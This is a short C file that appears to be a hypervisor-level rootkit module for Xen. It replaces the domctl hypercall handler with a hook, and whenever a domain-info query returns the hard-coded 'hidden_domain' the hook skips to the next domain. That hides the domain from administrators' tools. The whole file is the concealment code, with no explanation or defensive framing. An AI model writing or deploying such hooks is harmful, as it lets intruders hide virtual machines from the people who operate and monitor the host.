#include <xenlib.h>
#include <stdint.h>
#include <public/xen.h>
#include <public/domctl.h>
long (*orig_domctl) (void *);
long hidden_domain = 0xaabbccdd;
long my_domctl(struct xen_domctl *p)
{
	long ret;
	ret = orig_domctl(p);
	if (ret || p->cmd != XEN_DOMCTL_getdomaininfo ||
	    p->domain != hidden_domain)
		return ret;
	p->domain++;
	return orig_domctl(p);
}

int init_module()
{
	orig_domctl = hypercall_table[__HYPERVISOR_domctl];
	hypercall_table[__HYPERVISOR_domctl] = my_domctl;
	return 0;
}

void cleanup_module()
{
	hypercall_table[__HYPERVISOR_domctl] = orig_domctl;
}
